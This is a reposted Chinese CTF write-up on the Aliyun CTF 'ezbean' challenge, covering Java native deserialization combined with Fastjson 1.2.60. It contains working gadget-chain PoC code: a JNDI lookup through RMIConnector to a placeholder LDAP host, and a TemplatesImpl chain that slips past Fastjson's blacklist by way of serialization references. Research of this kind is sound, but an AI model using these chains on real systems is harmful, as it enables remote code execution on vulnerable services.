Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

admin
admin
admin
138704
文章
114
评论
2023年6月19日00:19:37评论79 views字数 6143阅读20分28秒阅读模式

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

2023 Aliyun CTF ezbean 是一道 CTF java 反序列化题目。题目的目的是让选手通过一个 java 原生反序列化入口,最终达成 RCE。本文对题目的几种解法做了具体的分析,主要分为预期解法和非预期解法两种思路。通过对 Fastjson 在反序列化的行为分析,从两个方向攻克本题。

01

预期解

题目的逻辑简单清晰,通过 /read 路由可以传入 data 参数进行反序列化。题目的依赖就是 springboot 和 fastjson1.2.60 。
package com.ctf.ezser.utils;

import java.io.IOException;import java.io.InputStream;import java.io.InvalidClassException;import java.io.ObjectInputStream;import java.io.ObjectStreamClass;import java.util.Arrays;import java.util.HashSet;import java.util.Set;

public class MyObjectInputStream extends ObjectInputStream {

   private static final String[] blacklist = new String[]{           "java\.security.*", "java\.rmi.*",  "com\.fasterxml.*", "com\.ctf\.*",           "org\.springframework.*", "org\.yaml.*", "javax\.management\.remote.*"   };

   public MyObjectInputStream(InputStream inputStream) throws IOException {      super(inputStream);   }

   protected Class resolveClass(ObjectStreamClass cls) throws IOException, ClassNotFoundException {      if(!contains(cls.getName())) {         return super.resolveClass(cls);      } else {         throw new InvalidClassException("Unexpected serialized class", cls.getName());      }   }

   public static boolean contains(String targetValue) {      for (String forbiddenPackage : blacklist) {         if (targetValue.matches(forbiddenPackage))            return true;      }      return false;   }}
向右滑动查看完整代码
可以看到 MyObjectInputStream 继承 ObjectInputStream 并重写了 resolveClass() 方法,对反序列化的类进行了检查。
结合黑名单容易想到需要进行二次反序列化,但是常见的二次反序列化的起点类都被 ban 了,结合 pom.xml 中的 Fastjson 依赖考虑使用 Fastjson 进行反序列化。结合题目给的 MyBean 类
package com.ctf.ezser.bean;

import java.io.IOException;import java.io.Serializable;import javax.management.remote.JMXConnector;

public class MyBean implements Serializable {

   private Object url;   private Object message;   private JMXConnector conn;



   public MyBean() {}

   public MyBean(Object url, Object message) {      this.url = url;      this.message = message;   }

   public MyBean(Object url, Object message, JMXConnector conn) {      this.url = url;      this.message = message;      this.conn = conn;   }

   public String getConnect() throws IOException {      try {         this.conn.connect();         return "success";      } catch (IOException var2) {         return "fail";      }   }

   public void connect() {}

   public Object getMessage() {      return this.message;   }

   public void setMessage(Object message) {      this.message = message;   }

   public Object getUrl() {      return this.url;   }

   public void setUrl(Object url) {      this.url = url;   }}
向右滑动查看完整代码
JMXConnector 接口的实现类在题目环境下仅存在 RMIConnector 一种实现类,结合 JMXService 可以在调用 getConnect() 方法时触发 JNDI 查询。这里不难想到利用 Fastjson 调用 Mybean 的 getter 方法。
结合题目可以想到利用 javax.management.BadAttributeValueExpException 作为反序列化起点,这个 BadAttributeException 在反序列化时会对自己的 val 属性调用 toString 方法。

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

将 JSONObject 作为 val ,也就相当于调用了 JSONObejct 的 toString() 方法。
在 Fastjson<=1.2.48 时 Fastjson 没有实现自己的反序列化逻辑,但在高于 1.2.48 时 Fastjson 的 JSONObject 和 JSONArray 都实现了自己的 readObject()方法。

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

使用自己的 SecureObjectInputStream 包裹输入流从中获取序列化数据。

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

其中的 resolveClass 会调用 Fastjson 的 checkAutoType 来检查反序列化的数据是否合法。
RMIConnector 和 JMXService 在 Fastjson 1.2.60 中均不属于黑名单,按照 AutoType 的逻辑

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

这里 name 就是 classname 类名。expectClass 为 null。按照这里 autoTypeSupport 应该为 true 才不会 throw error,但是我们实际尝试发现其实并不会报错,但是我们也并没有手动开启 autoType。

这是因为在调用 checkAutoType 函数时我们传入的最后一个参数为 Feature.SupportAutoType.mask 。

而我们进行比较时用的是 feature & Feature.SupportAutoType.mask ,这里 feature 就是我们传入的 Feature.SupportAutoType.mask,这样就相当于传入了开启 autoType 的选项。

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

这里经过 mask 后为 true,也就相当于开启了 autoTypeSupport 。
JSONObject json= new JSONObject();JMXServiceURL jmxServiceURL = new JMXServiceURL("service:jmx:rmi:///jndi/ldap://xxx.xxx.xxx.xxx:1389/Tomcat");RMIConnector rmiConnector = new RMIConnector(jmxServiceURL,null);MyBean myBean = new MyBean("a","a", rmiConnector);json.put("YYY", myBean);BadAttributeValueExpException poc = new BadAttributeValueExpException(1);Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");val.setAccessible(true);val.set(poc,json);byte[] code =  serialize(poc);deserialize(code);
向右滑动查看完整代码
会出 Exception

exception in thread "main" com.alibaba.fastjson.JSONException: default constructor not found. class javax.management.remote.rmi.RMIConnector at com.alibaba.fastjson.util.JavaBeanInfo.build(JavaBeanInfo.java:516) at com.alibaba.fastjson.util.JavaBeanInfo.build(JavaBeanInfo.java:221)

阅读 JavaBeanInfo 逻辑可以知道它会尝试获取无参构造函数,我们的 RMIConnector 和 JMXService 都不具备无参数公有构造函数的条件,所以在这里一定会报错。当时比赛卡这里了,后来看了 WP 才知道,多打几次就可以。只需要多 deserialize(code); 几次即可,StrewHat 的 wp 写的是因为 fastjson 构造函数是随机获取,其实并非如此。我们来详细看一下为什么多反序列化几次就可以。

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

这里抛出异常

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

这里遍历了全部构造函数,寻找符合要求的构造函数,都找不到所以报错,这里阅读逻辑后发现和顺序没有关系,因为

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

无论运行多少次都会完整遍历 DeclaredCtor。那为什么进行多次反序列化后,就可以正常反序列化呢?继续向前看,在 ParserConfig 中

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

在 build 之前把这个类缓存了,存在一个 static 的 mapping 中

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

在第二次反序列化时

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

会在上层代码尝试从缓存获取类中拿到类因而提前返回。也就走不到 JavaBeanInfo.build 这一步,也就不会报错找不到默认构造函数了。因此只需要多打几次 payload 就能成功 rce 。

02

非预期解

Y4tacker 师傅前段时间发布了一篇(https://paper.seebug.org/2055/)关于

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

的文章,文中提到低版本才能利用,但其实高版本也能利用,这是因为后来有师傅提出可以利用 java 序列化机制中的引用机制来进行绕过

  • https://www.cnpanda.net/sec/928.html
  • https://y4tacker.github.io/2023/04/26/year/2023/4/FastJson%E4%B8%8E%E5%8E%9F%E7%94%9F%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-%E4%BA%8C/#%E5%AE%8C%E6%95%B4%E5%88%A9%E7%94%A8
简单来说,高版本不能利用的原因是因为 Fastjson 的 readObject 实现了自己的 resolveClass 逻辑,会 ban 黑名单中的类,比如 TemplatesImpl
Object tpl = createTemplatesImpl("open -a Calculator.app"); JSONObject jsonObject = new JSONObject(); jsonObject.put("gg",tpl); BadAttributeValueExpException poc = new BadAttributeValueExpException(null); Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val"); val.setAccessible(true); val.set(poc,jsonObject);
向右滑动查看完整代码
反序列化时会因为 TemplatesImpl 处于 fastjson 的黑名单中而被禁止反序列化

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

这里我们的思路就转变为如何绕过 resolveClass 函数检查。
通过对 java 原生反序列化流程的学习,我们先看在啥时候 java 会去调用 resolveClass ,毕竟反序列化的数据类型也有很多。

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

也就是只有 TC_CLASSDESC 会调用 readNonProxyDesc -> resolveClass 。由于我们要尝试绕过的东西本质是一个类,所以这里我们能选择的就是 TC_REFERENCE 或者 TC_PROXYCLASSDESC
我们先看看能不能用代理类绕过

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

可以看到在序列化过程中会使用反射判断一个类是否是代理类,若是代理类则写入 TC_PROXYCLASSDESC

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

反序列过程中会重建代理类,对于 TemplatesImpl 显然行不通

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

一路走不通只能考虑用 TC_REFERENCE 了
在序列化过程中

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

如果在 handles 中查到缓存的 obj,那就直接写 TC_REFERENCE

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

也就不会调用 resolveClass
最终 poc,没有用到题目给的 ezBean
Object tpl = createTemplatesImpl("open -a Calculator.app"); JSONObject jsonObject = new JSONObject(); jsonObject.put("gg",tpl); BadAttributeValueExpException poc = new BadAttributeValueExpException(null); Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val"); val.setAccessible(true); val.set(poc,jsonObject); HashMap hashMap = new HashMap(); hashMap.put(tpl,poc); byte[] code = serialize(poc); deserialize(code);
向右滑动查看完整代码

03

总结

这两种解法有一点异曲同工之妙,预期解利用 Fastjson 的缓存机制避免了找不到默认构造函数的问题,跳过了 BuildJavaBean 的环节;非预期解则是利用了 Fastjson 中 readObject 不正确的处理序列化数据方式,导致 handle 中已经缓存序列化对象而跳过 resolveClass 进而不被 Fastjson 的 chekcAutoType 黑名单检测。

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

原文始发于微信公众号(Yak Project):Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月19日00:19:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )https://cn-sec.com/archives/1814194.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息